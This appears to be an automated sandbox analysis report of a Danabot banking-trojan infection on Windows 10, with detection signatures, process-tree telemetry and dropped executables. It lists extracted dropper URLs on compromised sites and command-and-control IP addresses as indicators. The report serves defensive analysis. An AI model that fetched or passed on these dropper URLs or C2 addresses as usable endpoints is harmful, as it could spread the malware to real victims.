danabot | hxxp://google[.]com

Analysis

max time kernel
430s
max time network
432s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
03/07/2024, 08:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://google.com

Score

10^/10

danabot aspackv2 banker botnet macro trojan xlm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Danabot x86 payload 1 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

resource	yara_rule
behavioral1/files/0x000b000000023398-2071.dat	family_danabot

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2360	2400	powershell.exe	181

Blocklisted process makes network request 13 IoCs

flow	pid	Process
725	5972	rundll32.exe
738	2360	powershell.exe
740	2360	powershell.exe
743	5972	rundll32.exe
746	2360	powershell.exe
748	5972	rundll32.exe
751	5972	rundll32.exe
752	5972	rundll32.exe
756	5972	rundll32.exe
757	5972	rundll32.exe
759	5972	rundll32.exe
760	5972	rundll32.exe
761	5972	rundll32.exe

Downloads MZ/PE file

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

resource	yara_rule
behavioral1/files/0x000a000000023738-2355.dat	office_xlm_macros

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x000e00000002375e-2528.dat	aspack_v212_v242

Executes dropped EXE 6 IoCs

pid	Process
5780	DanaBot.exe
3200	Hydra.exe
2304	Hydra.exe
6104	Flasher.exe
5084	Flasher.exe
3248	Melting.exe

Loads dropped DLL 3 IoCs

pid	Process
1276	regsvr32.exe
5972	rundll32.exe
5972	rundll32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
722	raw.githubusercontent.com
723	raw.githubusercontent.com

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5872	5780	WerFault.exe	168

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2447855248-390457009-3660902674-1000\{EE6F1596-7362-4BB3-964E-9ADC43E98A3E}	msedge.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 53386.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 58898.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 90850.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 870143.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 410357.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4888	WINWORD.EXE
4888	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
4856	msedge.exe
4856	msedge.exe
2224	msedge.exe
2224	msedge.exe
2456	identity_helper.exe
2456	identity_helper.exe
4840	msedge.exe
4840	msedge.exe
5560	msedge.exe
5560	msedge.exe
5420	msedge.exe
5420	msedge.exe
5420	msedge.exe
5420	msedge.exe
1152	msedge.exe
1152	msedge.exe
3024	msedge.exe
3024	msedge.exe
2712	msedge.exe
2712	msedge.exe
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
1416	msedge.exe
1416	msedge.exe
5372	msedge.exe
5372	msedge.exe
1380	msedge.exe
1380	msedge.exe
4388	msedge.exe
4388	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2224	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 42 IoCs

pid	Process
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
4888	WINWORD.EXE
4888	WINWORD.EXE
2224	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE
4888	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2224 wrote to memory of 2868	2224	msedge.exe	83
PID 2224 wrote to memory of 2868	2224	msedge.exe	83
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 2824	2224	msedge.exe	84
PID 2224 wrote to memory of 4856	2224	msedge.exe	85
PID 2224 wrote to memory of 4856	2224	msedge.exe	85
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86
PID 2224 wrote to memory of 1856	2224	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcdd4c46f8,0x7ffcdd4c4708,0x7ffcdd4c4718
  2⤵
  PID:2868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2
  2⤵
  PID:2824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:3048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:1380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
  2⤵
  PID:1988
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
  2⤵
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
  2⤵
  PID:2720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:3200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5348 /prefetch:8
  2⤵
  PID:4452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3828 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1292 /prefetch:1
  2⤵
  PID:5300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
  2⤵
  PID:5632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5400 /prefetch:8
  2⤵
  PID:1104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7236 /prefetch:1
  2⤵
  PID:5996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7028 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5560
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\GTA 6.vbs"
  2⤵
  PID:1964
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\GTA 6.vbs"
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6300 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
